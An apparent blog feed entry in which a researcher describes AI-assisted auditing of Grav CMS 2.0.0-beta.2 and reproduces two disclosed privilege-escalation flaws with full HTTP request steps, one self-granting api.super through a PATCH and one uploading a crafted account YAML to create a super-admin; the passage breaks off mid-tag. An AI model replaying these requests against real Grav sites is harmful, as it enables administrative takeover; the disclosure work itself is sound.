https://0d000721999.github.io/tags/grav/ Recent content in Grav on 美咕噜的小站 Hugo -- gohugo.io zh-cn 无敌可爱美咕噜 Thu, 30 Apr 2026 00:00:00 +0000 https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/ Thu, 30 Apr 2026 00:00:00 +0000 https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/ <img src="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/1.png" alt="Featured image of post CVE-2026-42844(我的第一个CVE挖掘)" /><h1 id="cve-2026-42844我的第一个cve挖掘">CVE-2026-42844(我的第一个CVE挖掘) </h1><p>首先是一时兴起想着用ai进行代码审计，然后觉得php可能漏洞会多（刻板印象），于是写了个php-code-auidt.skill，规范了挖掘过程和最后审计报告的提供。</p> <p><strong>目标（</strong></p> <p><img src="C:%5cUsers%5c10086%5cAppData%5cRoaming%5cTypora%5ctypora-user-images%5cimage-20260507164550502.png" loading="lazy" alt="image-20260507164550502" ></p> <p>直接最新的release下下来，直接开始审计了，其实是审出两个漏洞了，但是一个给抢注了</p> <p>详细细节参考https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h</p> <p>然后另一个洞https://github.com/getgrav/grav/security/advisories/GHSA-r945-h4vm-h736</p> <p>我的审计报告如下：</p> <h1 id="cve-2026-42843">CVE-2026-42843 </h1><h2 id="summary">Summary </h2><p>In Grav <code>2.0.0-beta.2</code>, a normal authenticated API user with only <code>api.access</code> can update their own user object through <code>PATCH /api/v1/users/{self}</code> and set:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span><span class="nt">&#34;access&#34;</span><span class="p">:{</span><span class="nt">&#34;api&#34;</span><span class="p">:{</span><span class="nt">&#34;super&#34;</span><span class="p">:</span><span class="kc">true</span><span class="p">}}}</span> </span></span></code></pre></td></tr></table> </div> </div><p>The change takes effect immediately, allowing the user to become a full API super-admin.</p> <h2 id="recommended-severity">Recommended Severity </h2><p><code>High</code></p> <p>Rationale:</p> <ul> <li>authentication is required</li> <li>the required privilege is low (<code>api.access</code>)</li> <li>the impact is full administrative takeover</li> </ul> <h2 id="affected-version">Affected Version </h2><p>Verified locally on:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">Grav 2.0.0-beta.2 </span></span></code></pre></td></tr></table> </div> </div><h2 id="root-cause">Root Cause </h2><p>The self-update path for <code>/api/v1/users/{self}</code> only requires <code>api.access</code>, but the writable field list still includes the <code>access</code> tree.</p> <p>As a result, any normal API user can directly modify their own privileges and grant themselves <code>api.super</code>.</p> <h2 id="relevant-code">Relevant Code </h2><ul> <li><code>user/plugins/api/classes/Api/Controllers/UsersController.php:195-220</code></li> <li><code>user/plugins/api/classes/Api/Controllers/AbstractApiController.php:67-74</code></li> </ul> <h2 id="prerequisites">Prerequisites </h2><p>An authenticated API user with:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="nt">access</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">api</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">access</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w"> </span></span></span></code></pre></td></tr></table> </div> </div><p>No <code>api.super</code> permission is required.</p> <h2 id="reproduction">Reproduction </h2><h3 id="step-1-authenticate-as-a-normal-api-user">Step 1: Authenticate as a normal API user </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-http" data-lang="http"><span class="line"><span class="cl"><span class="nf">POST</span> <span class="nn">/api/v1/auth/token</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="o">:</span> <span class="l">127.0.0.1:8123</span> </span></span><span class="line"><span class="cl"><span class="n">Content-Type</span><span class="o">:</span> <span class="l">application/json</span> </span></span><span class="line"><span class="cl"><span class="n">Connection</span><span class="o">:</span> <span class="l">close</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">{</span><span class="nt">&#34;username&#34;</span><span class="p">:</span><span class="s2">&#34;editor&#34;</span><span class="p">,</span><span class="nt">&#34;password&#34;</span><span class="p">:</span><span class="s2">&#34;Editor123A&#34;</span><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Expected result:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;data&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;user&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;username&#34;</span><span class="p">:</span> <span class="s2">&#34;editor&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;super_admin&#34;</span><span class="p">:</span> <span class="kc">false</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Extract:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">EDITOR_TOKEN = &lt;access_token from response&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Attachment:</p> <p><img src="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/login-editor.png" width="1484" height="809" srcset="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/login-editor_hu17466756868753227622.png 480w, https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/login-editor_hu13524416348300942378.png 1024w" loading="lazy" alt="login-editor.png" class="gallery-image" data-flex-grow="183" data-flex-basis="440px" ></p> <h3 id="step-2-modify-the-current-users-own-access-tree">Step 2: Modify the current user&rsquo;s own <code>access</code> tree </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-http" data-lang="http"><span class="line"><span class="cl"><span class="nf">PATCH</span> <span class="nn">/api/v1/users/editor</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="o">:</span> <span class="l">127.0.0.1:8123</span> </span></span><span class="line"><span class="cl"><span class="n">X-API-Token</span><span class="o">:</span> <span class="l">&lt;EDITOR_TOKEN&gt;</span> </span></span><span class="line"><span class="cl"><span class="n">Content-Type</span><span class="o">:</span> <span class="l">application/json</span> </span></span><span class="line"><span class="cl"><span class="n">Connection</span><span class="o">:</span> <span class="l">close</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">{</span><span class="nt">&#34;access&#34;</span><span class="p">:{</span><span class="nt">&#34;api&#34;</span><span class="p">:{</span><span class="nt">&#34;super&#34;</span><span class="p">:</span><span class="kc">true</span><span class="p">}}}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Expected result:</p> <p>The request succeeds and the response contains:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;data&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;access&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;api&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;super&#34;</span><span class="p">:</span> <span class="kc">true</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Attachment:</p> <p><img src="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/patch-self-access.png" width="1480" height="814" srcset="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/patch-self-access_hu4864410900440866446.png 480w, https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/patch-self-access_hu8626632741531125235.png 1024w" loading="lazy" alt="patch-self-access.png" class="gallery-image" data-flex-grow="181" data-flex-basis="436px" ></p> <h3 id="step-3-confirm-that-the-user-is-now-a-super-admin">Step 3: Confirm that the user is now a super-admin </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-http" data-lang="http"><span class="line"><span class="cl"><span class="nf">GET</span> <span class="nn">/api/v1/me</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="o">:</span> <span class="l">127.0.0.1:8123</span> </span></span><span class="line"><span class="cl"><span class="n">X-API-Token</span><span class="o">:</span> <span class="l">&lt;EDITOR_TOKEN&gt;</span> </span></span><span class="line"><span class="cl"><span class="n">Connection</span><span class="o">:</span> <span class="l">close</span> </span></span></code></pre></td></tr></table> </div> </div><p>Expected result:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;data&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;username&#34;</span><span class="p">:</span> <span class="s2">&#34;editor&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;super_admin&#34;</span><span class="p">:</span> <span class="kc">true</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Attachment:</p> <p><img src="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/me-super-admin.png" width="1468" height="799" srcset="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/me-super-admin_hu16143021385424987279.png 480w, https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/me-super-admin_hu216544147841548739.png 1024w" loading="lazy" alt="me-super-admin.png" class="gallery-image" data-flex-grow="183" data-flex-basis="440px" ></p> <h3 id="step-4-access-a-privileged-api-endpoint">Step 4: Access a privileged API endpoint </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-http" data-lang="http"><span class="line"><span class="cl"><span class="nf">GET</span> <span class="nn">/api/v1/system/info</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="o">:</span> <span class="l">127.0.0.1:8123</span> </span></span><span class="line"><span class="cl"><span class="n">X-API-Token</span><span class="o">:</span> <span class="l">&lt;EDITOR_TOKEN&gt;</span> </span></span><span class="line"><span class="cl"><span class="n">Connection</span><span class="o">:</span> <span class="l">close</span> </span></span></code></pre></td></tr></table> </div> </div><p>Expected result:</p> <p>The request succeeds and returns system-level information.</p> <p>Attachment:</p> <p><img src="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/system-info-after-escalation.png" width="1479" height="825" srcset="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/system-info-after-escalation_hu16482604188796812592.png 480w, https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/system-info-after-escalation_hu8880364830123807421.png 1024w" loading="lazy" alt="system-info-after-escalation.png" class="gallery-image" data-flex-grow="179" data-flex-basis="430px" ></p> <h2 id="actual-verified-result">Actual Verified Result </h2><p>I reproduced this issue locally.</p> <ul> <li>the test user initially had <code>super_admin = false</code></li> <li><code>PATCH /api/v1/users/editor</code> succeeded</li> <li><code>/api/v1/me</code> then returned <code>super_admin = true</code></li> <li>privileged endpoints such as <code>/api/v1/system/info</code> were accessible immediately</li> </ul> <h2 id="security-impact">Security Impact </h2><p>This vulnerability allows any authenticated API user with normal API access to become a full API super-admin.</p> <h1 id="cve-2026-42844">CVE-2026-42844 </h1><h2 id="summary-1">Summary </h2><p>In Grav <code>2.0.0-beta.2</code>, a low-privileged authenticated API user with <code>api.media.write</code> can abuse <code>/api/v1/blueprint-upload</code> to write an arbitrary YAML file into <code>user/accounts/</code>, then log in as the newly created account with <code>api.super</code> privileges.</p> <p>This results in full administrative compromise of the Grav API.</p> <h2 id="recommended-severity-1">Recommended Severity </h2><p><code>High</code></p> <p>Rationale:</p> <ul> <li>authentication is required</li> <li>the required privilege is low (<code>api.media.write</code>)</li> <li>the impact is full administrative takeover</li> </ul> <h2 id="affected-version-1">Affected Version </h2><p>Verified locally on:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">Grav 2.0.0-beta.2 </span></span></code></pre></td></tr></table> </div> </div><h2 id="root-cause-1">Root Cause </h2><p>The <code>/api/v1/blueprint-upload</code> endpoint accepts caller-controlled <code>destination</code> and <code>scope</code> values.</p> <p>When the request uses:</p> <ul> <li><code>destination=self@:</code></li> <li><code>scope=users/anything</code></li> </ul> <p>the server resolves the write target to the shared account directory:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">user/accounts/ </span></span></code></pre></td></tr></table> </div> </div><p>The endpoint then writes the uploaded file there without restricting YAML account files.</p> <p>Because Grav accepts account YAML files and supports a plaintext <code>password:</code> value on first login, an attacker can create a fully functional administrator account.</p> <h2 id="relevant-code-1">Relevant Code </h2><ul> <li><code>user/plugins/api/classes/Api/ApiRouter.php:261</code></li> <li><code>user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:32-45</code></li> <li><code>user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:102-114</code></li> <li><code>user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:271-308</code></li> <li><code>user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:407-417</code></li> <li><code>user/plugins/api/classes/Api/Controllers/AuthController.php:41-55</code></li> </ul> <h2 id="prerequisites-1">Prerequisites </h2><p>An authenticated API user with:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="nt">access</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">api</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">access</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">media</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">write</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="w"> </span></span></span></code></pre></td></tr></table> </div> </div><h2 id="reproduction-1">Reproduction </h2><h3 id="step-1-authenticate-as-the-low-privileged-api-user">Step 1: Authenticate as the low-privileged API user </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-http" data-lang="http"><span class="line"><span class="cl"><span class="nf">POST</span> <span class="nn">/api/v1/auth/token</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="o">:</span> <span class="l">127.0.0.1:8123</span> </span></span><span class="line"><span class="cl"><span class="n">Content-Type</span><span class="o">:</span> <span class="l">application/json</span> </span></span><span class="line"><span class="cl"><span class="n">Connection</span><span class="o">:</span> <span class="l">close</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">{</span><span class="nt">&#34;username&#34;</span><span class="p">:</span><span class="s2">&#34;uploader&#34;</span><span class="p">,</span><span class="nt">&#34;password&#34;</span><span class="p">:</span><span class="s2">&#34;Upload123A&#34;</span><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Extract:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">UPLOADER_TOKEN = &lt;access_token from response&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Attachment:</p> <p><img src="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/login-uploader.png" width="1480" height="825" srcset="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/login-uploader_hu9979734477434401177.png 480w, https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/login-uploader_hu1337899103330560760.png 1024w" loading="lazy" alt="login-uploader.png" class="gallery-image" data-flex-grow="179" data-flex-basis="430px" ></p> <h3 id="step-2-upload-a-malicious-account-yaml-file">Step 2: Upload a malicious account YAML file </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-http" data-lang="http"><span class="line"><span class="cl"><span class="nf">POST</span> <span class="nn">/api/v1/blueprint-upload</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="o">:</span> <span class="l">127.0.0.1:8123</span> </span></span><span class="line"><span class="cl"><span class="n">X-API-Token</span><span class="o">:</span> <span class="l">&lt;UPLOADER_TOKEN&gt;</span> </span></span><span class="line"><span class="cl"><span class="n">Content-Type</span><span class="o">:</span> <span class="l">multipart/form-data; boundary=----CodexBoundaryF01</span> </span></span><span class="line"><span class="cl"><span class="n">Connection</span><span class="o">:</span> <span class="l">close</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------CodexBoundaryF01 </span></span><span class="line"><span class="cl">Content-Disposition: form-data; name=&#34;destination&#34; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">self@: </span></span><span class="line"><span class="cl">------CodexBoundaryF01 </span></span><span class="line"><span class="cl">Content-Disposition: form-data; name=&#34;scope&#34; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">users/anything </span></span><span class="line"><span class="cl">------CodexBoundaryF01 </span></span><span class="line"><span class="cl">Content-Disposition: form-data; name=&#34;file&#34;; filename=&#34;pwned.yaml&#34; </span></span><span class="line"><span class="cl">Content-Type: text/yaml </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">email: attacker@example.com </span></span><span class="line"><span class="cl">fullname: attacker </span></span><span class="line"><span class="cl">title: Site Administrator </span></span><span class="line"><span class="cl">state: enabled </span></span><span class="line"><span class="cl">password: Passw0rd!123 </span></span><span class="line"><span class="cl">access: </span></span><span class="line"><span class="cl"> site: </span></span><span class="line"><span class="cl"> login: true </span></span><span class="line"><span class="cl"> api: </span></span><span class="line"><span class="cl"> super: true </span></span><span class="line"><span class="cl">------CodexBoundaryF01-- </span></span></code></pre></td></tr></table> </div> </div><p>Expected result:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;data&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;name&#34;</span><span class="p">:</span> <span class="s2">&#34;pwned.yaml&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;path&#34;</span><span class="p">:</span> <span class="s2">&#34;user/accounts/pwned.yaml&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Attachment:</p> <p><img src="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/upload.png" width="1484" height="797" srcset="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/upload_hu651313702269738902.png 480w, https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/upload_hu4394338329728354514.png 1024w" loading="lazy" alt="upload.png" class="gallery-image" data-flex-grow="186" data-flex-basis="446px" ></p> <h3 id="step-3-log-in-as-the-newly-created-account">Step 3: Log in as the newly created account </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-http" data-lang="http"><span class="line"><span class="cl"><span class="nf">POST</span> <span class="nn">/api/v1/auth/token</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="o">:</span> <span class="l">127.0.0.1:8123</span> </span></span><span class="line"><span class="cl"><span class="n">Content-Type</span><span class="o">:</span> <span class="l">application/json</span> </span></span><span class="line"><span class="cl"><span class="n">Connection</span><span class="o">:</span> <span class="l">close</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">{</span><span class="nt">&#34;username&#34;</span><span class="p">:</span><span class="s2">&#34;pwned&#34;</span><span class="p">,</span><span class="nt">&#34;password&#34;</span><span class="p">:</span><span class="s2">&#34;Passw0rd!123&#34;</span><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Expected result:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;data&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;user&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;username&#34;</span><span class="p">:</span> <span class="s2">&#34;pwned&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;super_admin&#34;</span><span class="p">:</span> <span class="kc">true</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Attachment:</p> <p><img src="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/pwned-login.png" width="1494" height="830" srcset="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/pwned-login_hu6571618057841582258.png 480w, 